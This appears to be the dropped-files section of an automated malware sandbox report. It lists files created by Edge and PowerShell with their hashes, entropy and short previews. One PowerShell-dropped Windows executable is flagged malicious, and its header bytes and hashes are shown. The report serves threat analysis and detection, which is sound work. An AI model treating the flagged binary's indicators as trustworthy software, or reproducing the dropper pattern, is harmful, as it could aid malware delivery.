                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):14
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.3787834934861767
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:ZK7q6:ZA
                                                                                                                                                                                                                                                                                              MD5:DF741B3F19D9DC2621EAF973C8C9FA9D
                                                                                                                                                                                                                                                                                              SHA1:F45F1D9791C05366A8A23322D497C89957E75E61
                                                                                                                                                                                                                                                                                              SHA-256:6E5DDBA6D7AA3B287EA364034E1F843E4146FF92C07D8426F4A7C4B0E6435006
                                                                                                                                                                                                                                                                                              SHA-512:650DE3F99038BFFBFEF41A9ACC0A06E15803550C6456D0BDEAC9EBE18AEA94AB3A0BB7D85B7A0230CE6F510F5E26FA739FE58924F355D7E3714EC37DAA4C70D2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:downloadCache_
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.023948700965957
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YTyLSmafBoTf7hf3TozRLuLgfGBkGAeekVy8Hfjg9PIAclWACwY4Yn:YWLSGT7hf3To9LuLgfGBPAzkVj/EMlWL
                                                                                                                                                                                                                                                                                              MD5:8DE1A6232168268D940BAFCDB366A527
                                                                                                                                                                                                                                                                                              SHA1:77839BBA58090F492A37348C8F6F9A360C931C83
                                                                                                                                                                                                                                                                                              SHA-256:07944BA5E0D5854A73E8449503A66EF93F0B2127FCF1DCA483763DEBCBC96936
                                                                                                                                                                                                                                                                                              SHA-512:B4AAAF462AFB166C194A184F8104068D3C447F2C96411682D2896C2CA1BFE0700D46CEE88F4A4FDDD6A7A0B771BBEA858AE5D88A25A48CAAA641AE0575F459CE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"version":1,"cache_data":[{"file_hash":"59014bc64d802da7","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":0,"expiration_time":1733953230991671}]}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                              MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                              SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                              SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                              SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:uriCache_
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.018471326712627
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YTyLSmafBoTf7hf3TozRLuLgfGBkGAeekVy8HfzXNPIAclWAgg:YWLSGT7hf3To9LuLgfGBPAzkVj/T8lWO
                                                                                                                                                                                                                                                                                              MD5:EFCA4353C03810D6D2FBD6834C1D81C3
                                                                                                                                                                                                                                                                                              SHA1:020569730A08A29BB9B2D164AAB3A55C7B5C8CDC
                                                                                                                                                                                                                                                                                              SHA-256:FB49DC924C2427F39E1549D8F5BF56B6F5A628ED5A981AD67BA361BC14BB6537
                                                                                                                                                                                                                                                                                              SHA-512:6ECE191924C03A51AB8002D6A91825722F7B197D065920F081A89B320A22C86ACCCB50DBF79441EBD03A8152B09F034BAB672C4EC2B9D1A6B538A7133A98C730
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"version":1,"cache_data":[{"file_hash":"59014bc64d802da7","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1733953229534200}]}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):85
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQHn:YQ3Kq9X0dMgAEiLIFn
                                                                                                                                                                                                                                                                                              MD5:0E16444393CD322124146935AB837ECC
                                                                                                                                                                                                                                                                                              SHA1:AA1A3E9571E3E067421D940601965220711F24AD
                                                                                                                                                                                                                                                                                              SHA-256:1B5DE2BF736E2BB182CF64BD8A72BBBD6538A9F33DC8020223B2257BAD6F7D82
                                                                                                                                                                                                                                                                                              SHA-512:26C461B0493C5E0F26AA196CE94C0C9EA5D892220EBE882AF4BF2892469515E9B13056EF7AE0F9C429F45C14F334299CCFFA5BAB1547B3DA0E2FCE45131630A0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":3}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45714
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.0880020412572415
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:cMkbJrT8IeQc5W9fcQIuhDO6vP6OBDIvlqg5WbR6FFSsKRTxOCAolGoup1Xl3jV+:cMk1rT8He9f06tIv8s9Rolhu3VlXr4t
                                                                                                                                                                                                                                                                                              MD5:89F6D47E42CDBC4B53E1D34E8C4922F8
                                                                                                                                                                                                                                                                                              SHA1:FD49E5C8606D133D9EF5252D7E35D1871DA8FFDE
                                                                                                                                                                                                                                                                                              SHA-256:E53DAE76715FDE2CDE16B8196582214F77FCCE6CE574801F89BE6F16CD272078
                                                                                                                                                                                                                                                                                              SHA-512:715F676850268A11964C1D7A370B0C5AC7B071C291E3CDB05D1310ABE57F5B6C509A2A119DFC4FDA02312388639D5CF695DB9BA45A6B626553DC19C5FDAD3540
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852424"},"domain_actions_config":"
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45637
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.088097985012584
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:sMkbJrT8IeQc5d9fchVhDO6vP6OBDIvlqg5WbR6FFSsKRTxOCAolGoup1Xl3jVzC:sMk1rT8H19fZ6tIv4s9Rolhu3VlXr4t
                                                                                                                                                                                                                                                                                              MD5:91775F9A3B20BE0EDFAD817776BC2B03
                                                                                                                                                                                                                                                                                              SHA1:C3A3C3BAC711BB5123B8D3B14C350716E783110F
                                                                                                                                                                                                                                                                                              SHA-256:2EDA0F21CE81ED2F2AE053B7A02672EF819384B321C59E237356AE9C01959CFA
                                                                                                                                                                                                                                                                                              SHA-512:3C473612BD23B0BEF110AD997A708B997DF9CDE9BA6927462BA39817A4B4ACE71801CD1DE8D92DE0317C947E0BE56A45E556A71589A97FDB328C7AFC08D31C19
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852424"},"domain_actions_config":"
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44616
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.09719757233552
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBSwuohDO6vP6OBDIvlyv5XTuMTmuK7cGoup1Xl3j0:z/Ps+wsI7ynEy6tIvL7chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:7ACFFE5BBE963672BD18F1AE49C56EA1
                                                                                                                                                                                                                                                                                              SHA1:FFF2820BC48B5AF221F94D44DB8E12DC1FD1A56A
                                                                                                                                                                                                                                                                                              SHA-256:501D6FF0F797EB3F9CFB48FE3004CE7D976E09B08193B22F5B09170D0970093E
                                                                                                                                                                                                                                                                                              SHA-512:5F28D56C304B84A5083169C193035199B1BC771CB2EB218B7C973D33DD5E3E98F9CA2F30BEAEF63CF639A9B8306C0D4BE29E35B029548A8531A84EAF04C3261F
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45637
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.088081398636833
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:cMkbJrT8IeQc5d9fcQIuhDO6vP6OBDIvlqg5WbR6FFSsKRTxOCAolGoup1Xl3jV+:cMk1rT8H19f06tIv4s9Rolhu3VlXr4t
                                                                                                                                                                                                                                                                                              MD5:7C37225515781DD53E6FD88A1EE381C0
                                                                                                                                                                                                                                                                                              SHA1:E942400B0170341C07F9B0FFCEA18D9E6003DE71
                                                                                                                                                                                                                                                                                              SHA-256:F976EE1015CAEE46B448257EAEF4B927DFFDA00D5EE713D1182CFDAD4D2B97B0
                                                                                                                                                                                                                                                                                              SHA-512:7485CEBC59735EDFDB786F782751DEBF5B23A6FD35C17CAE191AA530F60087572733670E78464A400A1EAF62FEB0D60121057023AB599D737D6E5579D38DB252
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852424"},"domain_actions_config":"
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2278
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8452208714888876
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKxrgxzxl9Il8udmyDX5Ai+XpzgKBY8Cd1rc:myYbmy1L4z368h
                                                                                                                                                                                                                                                                                              MD5:DAF9C8E4406B3434E9813BF243DF86F3
                                                                                                                                                                                                                                                                                              SHA1:8246264B7D6FDD53B61BC60A2B669422ECCD1993
                                                                                                                                                                                                                                                                                              SHA-256:43DF99E7DFE82955AF8DA74AE33386E3EC9FB4063A405A03EC7228F6643C58F9
                                                                                                                                                                                                                                                                                              SHA-512:2DBC97A09014EF450E8E549B76798213D794C56AE340EB86C538954191986EEDDFB2D3C0E33245EA79EF8E3CB29CEAEED100B9F66B197AFF4B45B0E80ED8BC9A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4622
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.000591922419534
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKxExUxD9Il8u+0d78eEhW01UaMZ5pa2wTQcU9a6j0SxWKOwlg3DQ95Kc/O1:OYE0h8dhW0KaMZ5pdcEHQKOwlD95VC
                                                                                                                                                                                                                                                                                              MD5:6C2BB2975FA62F1D4FE32EB66B33EDBE
                                                                                                                                                                                                                                                                                              SHA1:4F5CEB7BA666CF665D285BECF926D492924681FC
                                                                                                                                                                                                                                                                                              SHA-256:1823C206BB72040A7CC26705A6E5DA13C78D07ABA766CE52DCC2F37119CA0CB0
                                                                                                                                                                                                                                                                                              SHA-512:140F1123C386F64051E894A83425F3B8593863D99268E0CA944B4D8EA38B178E4225159F64B0ABBC28CCDD63F374460984B67A4CDD61B01266561EA3F372B02F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Y.C.g.i.3.y.p.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.M.z.A.U.6.Z.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2684
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.892689255406663
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:uiTrlKx68Wa7xQxl9Il8uNbESOXbCL6LAy6NRfmSlEGzcR1HGwAo9vqgd/vc:aSYnsXblLAy6N5murs1HGwAo9qZ
                                                                                                                                                                                                                                                                                              MD5:8B10D38AB6920DBD2957E4929A1060B8
                                                                                                                                                                                                                                                                                              SHA1:84B244DDD041DD4E5B8B8BE072C0F0B3EC16867A
                                                                                                                                                                                                                                                                                              SHA-256:F5C5F6D72C8827C9DDC3B0951238D8A574FC8B5C7D442FA3AED5F71F786F22EF
                                                                                                                                                                                                                                                                                              SHA-512:C07E946DDBD74CFE01C2822F048C316A928417DA28B3853E510A29F98FC1DBE8B82A62A2DF35FB9DBA633DABAD377FA58A4F7EF432C843038443E6BD728E30EA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".d.P.r.U.D.v.x.p.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.M.z.A.U.6.Z.
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61147
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.077943793919534
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
                                                                                                                                                                                                                                                                                              MD5:95B7548D8D8DDBAB0877BFC7F500503D
                                                                                                                                                                                                                                                                                              SHA1:894B9735A30AE067FF88622B4F9C8EDF36997F6F
                                                                                                                                                                                                                                                                                              SHA-256:D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
                                                                                                                                                                                                                                                                                              SHA-512:B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Nlllul9kLZ:NllUG
                                                                                                                                                                                                                                                                                              MD5:087D847469EB88D02E57100D76A2E8E4
                                                                                                                                                                                                                                                                                              SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                                                                                                                                                                                                                                                                              SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                                                                                                                                                                                                                                                                              SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:@...e.................................,..............@..........
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1843712
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.178746640907945
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:jgroExwGqf9gSdRye+kwlwW5maKlkvKNeEK4V0:sroExTk9gSdkt
                                                                                                                                                                                                                                                                                              MD5:EB40135D3E0FE985A9E09970DC09A499
                                                                                                                                                                                                                                                                                              SHA1:8AF34D2B5006683471BF521745FC08F75E25F5A5
                                                                                                                                                                                                                                                                                              SHA-256:AA0DE67AABBC67EFFDEEF899E9B68E072AA927BFEC1D95202740702615FE06F6
                                                                                                                                                                                                                                                                                              SHA-512:BE9D06812BDF15374EBA53053CE3BF3BE98FA26DC6F0C7361F0458ECAFBE03ABB7840C3A0995843D2CB31316CDDACF74ABD992952F7C9957E83A4455D71FD592
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0..0..0......1......3......*....].3....^.=....H.%....O.?....X.'..0.......A......_.1....Z.1..Rich0..................PE..L......e.....................v.......4............@..........................P.......f....@..................................+..........$................S...p.........................................@...............p............................text............................... ..`.rdata..............................@..@.data....0...`.......H..............@....rsrc...$............d..............@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):106848
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                              MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                              SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                              SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                              SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11185
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                              MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                              SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                              SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                              SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1
